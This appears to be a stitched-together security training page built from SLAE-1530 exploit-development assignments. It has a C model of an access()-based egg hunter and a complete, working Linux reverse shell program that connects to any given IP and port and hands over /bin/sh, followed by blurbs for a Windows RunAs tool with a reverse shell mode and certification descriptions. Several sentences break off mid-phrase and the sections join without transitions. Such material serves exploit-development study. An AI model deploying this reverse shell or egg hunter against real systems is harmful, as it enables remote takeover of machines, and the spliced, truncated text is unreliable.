Assignment Goals (SLAE-1530)
1) Study the Egg Hunter shellcode.
2) Create a working demo of the egg hunter.
3) It should be configurable for different payloads.
What is an Egg Hunter Shellcode?
An egg hunter is a very small piece of shellcode designed to find another, usually much larger, shellcode somewhere in memory. To do so, it scans the process's memory in search of a special marker pattern. This pattern is called the egg and is placed immediately before the second, larger shellcode. When the egg is found in memory, the egg hunter redirects the execution flow to the code that follows it. This is useful when the buffer we control at the point of the crash is too small to hold the full payload, but a larger copy of that payload has landed somewhere else in the process's memory.
An egg is composed of 4 bytes (the size of a memory address on x86-32 processors), for example "ABCD" (0x44434241 when read as a little-endian dword). We generally repeat the egg once, giving an 8-byte marker, to avoid "collisions". Repeating it also prevents the hunter from matching the single copy of the egg that sits inside its own code as an immediate operand.
Imagine we choose ABCD as our egg: ABCD is a common string and we could find this pattern at multiple memory locations, but ABCDABCD is much less likely to occur by accident. ABCD is not a good choice anyway since it is too common, even when repeated. It is important to choose something you do not often see in programs and memory, for example
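To make the search concrete, here is an added example in C (not the assignment's own shellcode, which is written in assembly) that models the well-known access()-based Linux egg hunter design. Because the hunter walks memory it does not own, it cannot simply read every address: touching an unmapped page would crash it. Instead it asks the kernel to touch the page on its behalf by passing the address as the "pathname" argument of access(); the kernel answers EFAULT for an unmapped address and something else (ENOENT, ENAMETOOLONG, or success) for a readable one. Only after a page passes the probe is it scanned byte by byte for two consecutive copies of the egg. The function and variable names (page_readable, egg_hunt, demo_egg_hunt), the egg value 0x50905090 and the three-page test layout with a deliberately unmapped hole in the middle are this example's own assumptions:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define PAGE_SZ 4096UL

/* Probe one page the way the access()-based egg hunter does: the kernel must
 * copy the "pathname" from user space, so an unmapped address yields EFAULT.
 * Any other outcome (ENOENT, ENAMETOOLONG, success) means the page is readable.
 * The kernel copies at most PATH_MAX (4096) bytes, so a probe at a page start
 * never touches the following page. */
static int page_readable(uintptr_t page)
{
    errno = 0;
    if (access((const char *)page, F_OK) == 0)
        return 1;
    return errno != EFAULT;
}

/* Scan [start, end) byte by byte for two consecutive copies of `egg`.
 * Returns the address just past the doubled egg (where the payload starts),
 * or 0 if it is not found. Pages that fail the probe are skipped whole. */
uintptr_t egg_hunt(uint32_t egg, uintptr_t start, uintptr_t end)
{
    if (end < start + 8)
        return 0;
    uintptr_t page = start & ~(PAGE_SZ - 1);
    int cur_ok = page_readable(page);
    for (; page < end; page += PAGE_SZ) {
        uintptr_t next = page + PAGE_SZ;
        int next_ok = next < end ? page_readable(next) : 0;
        if (cur_ok) {
            uintptr_t first = page > start ? page : start;
            /* a candidate needs 8 readable bytes: stop 8 short of the page end
             * unless the following page is known to be readable too */
            uintptr_t last = next_ok ? next - 1 : next - 8;
            if (last > end - 8)
                last = end - 8;
            for (uintptr_t p = first; p <= last; p++) {
                uint32_t a, b;
                memcpy(&a, (const void *)p, 4);
                memcpy(&b, (const void *)(p + 4), 4);
                if (a == egg && b == egg)
                    return p + 8;
            }
        }
        cur_ok = next_ok;
    }
    return 0;
}

/* Constructed demo (not real attack data): three anonymous pages, the middle
 * one unmapped so the hunter has to cross an EFAULT hole. The doubled egg plus
 * a one-byte stand-in payload sit at offset 100 of the third page. Returns the
 * offset of the payload within the region, or 0 on failure. */
unsigned long demo_egg_hunt(void)
{
    uint32_t egg = 0x50905090;       /* bytes 90 50 90 50: nop / push eax, executable */
    uint8_t *region = mmap(NULL, 3 * PAGE_SZ, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (region == MAP_FAILED)
        return 0;
    if (munmap(region + PAGE_SZ, PAGE_SZ) != 0)
        return 0;
    uint8_t *spot = region + 2 * PAGE_SZ + 100;
    memcpy(spot, &egg, 4);
    memcpy(spot + 4, &egg, 4);
    spot[8] = 0xCC;                  /* int3: stands in for the real payload */

    uintptr_t hit = egg_hunt(egg, (uintptr_t)region, (uintptr_t)region + 3 * PAGE_SZ);
    unsigned long off = 0;
    if (hit && *(uint8_t *)hit == 0xCC)
        off = (unsigned long)(hit - (uintptr_t)region);
    munmap(region, PAGE_SZ);
    munmap(region + 2 * PAGE_SZ, PAGE_SZ);
    return off;
}

int main(void)
{
    unsigned long off = demo_egg_hunt();
    if (off)
        printf("payload found at region offset %lu (third page + %lu)\n", off, off - 2 * PAGE_SZ);
    else
        printf("egg not found\n");
    return off ? 0 : 1;
}
```

The egg is the only value that changes between payloads, which is what makes the hunter configurable: in the assembly version it is the immediate loaded before the two scasd comparisons, and the access() probe is syscall number 33 on x86-32 with the EFAULT result recognised as al == 0xf2 (the low byte of -14). The probe-then-scan structure above is the part a real shellcode must get right, since a missed probe turns into a segfault in the target process.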
Assignment Goals (SLAE-1530)
1) Create a TCP reverse shell shellcode for Linux x86-32.
2) The port number should be easily configurable.
3) The IP address should be easily configurable.
TCP Reverse Shell Principle
In the first exercise we learnt how to create our own TCP bind shell shellcode using a few syscalls (
A reverse shell is almost identical to a classic bind shell: instead of a shellcode that listens for new clients, we create one that connects back to a remote server under our control.
Fortunately, on Linux no special privileges are needed to open an outgoing TCP connection, unlike binding to a port below 1024, so the client-side socket sequence works from any unprivileged process.
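The sequence the shellcode has to reproduce is socket(), connect(), three dup2() calls and execve(), in that order. As an added example (written for this page, not the assignment's own assembly), the C program below performs exactly that sequence and then checks it end to end on the loopback interface: the parent process plays the attacker's listener, the forked child plays the victim running the reverse shell, and a command sent through the socket must come back executed. The function names reverse_connect, attach_shell and demo_round_trip, the use of 127.0.0.1 with a kernel-chosen port, and the "echo reverse-$((6*7))" probe command are this example's own constructions:

```c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <unistd.h>

/* Step 1: socket() + connect() back to the listener. The IP and port are the
 * two values the assignment wants to be configurable; in shellcode they end up
 * as the immediates pushed to build this same sockaddr_in. */
int reverse_connect(const char *ip, unsigned short port)
{
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);                          /* network byte order */
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Steps 2 and 3: point stdin/stdout/stderr at the socket, then execve /bin/sh.
 * Only returns on failure. */
int attach_shell(int fd)
{
    char *argv[] = { "/bin/sh", NULL };
    for (int i = 0; i < 3; i++)
        if (dup2(fd, i) < 0)
            return -1;
    execve("/bin/sh", argv, NULL);
    return -1;
}

/* Constructed loopback demo: the parent is the listener (what "nc -lvp PORT"
 * would be on the attacker side), the child runs the reverse shell. Returns 1
 * if the shell executes a command received over the socket and its output
 * comes back, 0 otherwise. Timeouts keep a failure from hanging the demo. */
int demo_round_trip(void)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    struct timeval tv = { 5, 0 };
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0)
        return 0;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;                                    /* kernel picks a free port */
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) != 0 || listen(lfd, 1) != 0 ||
        getsockname(lfd, (struct sockaddr *)&sa, &len) != 0) {
        close(lfd);
        return 0;
    }
    unsigned short port = ntohs(sa.sin_port);
    setsockopt(lfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);   /* bounds accept() */

    pid_t pid = fork();
    if (pid < 0) {
        close(lfd);
        return 0;
    }
    if (pid == 0) {                                     /* victim side */
        close(lfd);
        int fd = reverse_connect("127.0.0.1", port);
        if (fd >= 0)
            attach_shell(fd);
        _exit(127);
    }

    int ok = 0;
    int cfd = accept(lfd, NULL, NULL);
    close(lfd);
    if (cfd >= 0) {
        setsockopt(cfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
        const char *cmd = "echo reverse-$((6*7)); exit\n";   /* proves a real shell answers */
        char buf[256] = { 0 };
        size_t got = 0;
        if (send(cfd, cmd, strlen(cmd), MSG_NOSIGNAL) == (ssize_t)strlen(cmd)) {
            for (;;) {
                ssize_t n = read(cfd, buf + got, sizeof buf - 1 - got);
                if (n <= 0)
                    break;
                got += (size_t)n;
                if (strstr(buf, "reverse-42")) {
                    ok = 1;
                    break;
                }
                if (got >= sizeof buf - 1)
                    break;
            }
        }
        close(cfd);
    }
    waitpid(pid, NULL, 0);
    return ok;
}

int main(int argc, char **argv)
{
    if (argc == 3) {                                    /* ./revshell <ip> <port> */
        int fd = reverse_connect(argv[1], (unsigned short)atoi(argv[2]));
        if (fd >= 0)
            attach_shell(fd);                           /* only returns on failure */
        return 1;
    }
    printf("loopback demo: %s\n", demo_round_trip() ? "shell answered" : "failed");
    return 0;
}
```

When the same sequence is translated to shellcode, sa.sin_port is the 16-bit immediate stored after htons() and sa.sin_addr is the 4-byte immediate holding the address in network order; those two constants are what "easily configurable" means in practice. One caveat worth checking before shipping the bytes: an address or port containing a zero byte (10.0.0.1, or port 256 = 0x0100) puts a NUL into the shellcode, which many string-based injection vectors will truncate, so such values need an encoding trick rather than a plain immediate.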
You can find another variant of this program, which does not require networking functions and is also compatible with client applications such as Netcat and Telnet, here: [RunAsAttached](https://www.phrozen.io/paper/infosec-tools/runasattached)
The RunAsAttached (Local) version is more stable.
The goal of the networked version was to demonstrate inter-process communication using socket programming.
RunAsAttached (Networked) - 32bit / 64bit
RunAsAttached is a program to run a console as another user and keep the new console attached to the caller's console. It supports a reverse shell mode (for example with Netcat).
RunAs Attached (Local) - 32bit / 64bit
Creates a new application process as another Microsoft Windows user and attaches its inputs and outputs (stdin, stdout, stderr) to the caller's console, so the new process is interactively attached to the console it was launched from.
RunAsAttached.exe -u -p [-d ]
Available in the download section.
RunAs (Microsoft Windows) - 32bit / 64bit.
This program is an example of how to easily run any program as any user.
-u <username>: Launch the program as the given username.
-p <password>: Password associated with the username account.
-e <program>: Executable path (e.g. notepad.exe).
OSWPs are able to identify the encryption schemes in use and the vulnerabilities present in 802.11 networks. They can circumvent network security restrictions and recover the encryption keys in use.
An OSCP has demonstrated the ability to use persistence, creativity, and perceptiveness to identify vulnerabilities and execute organized attacks under tight time constraints.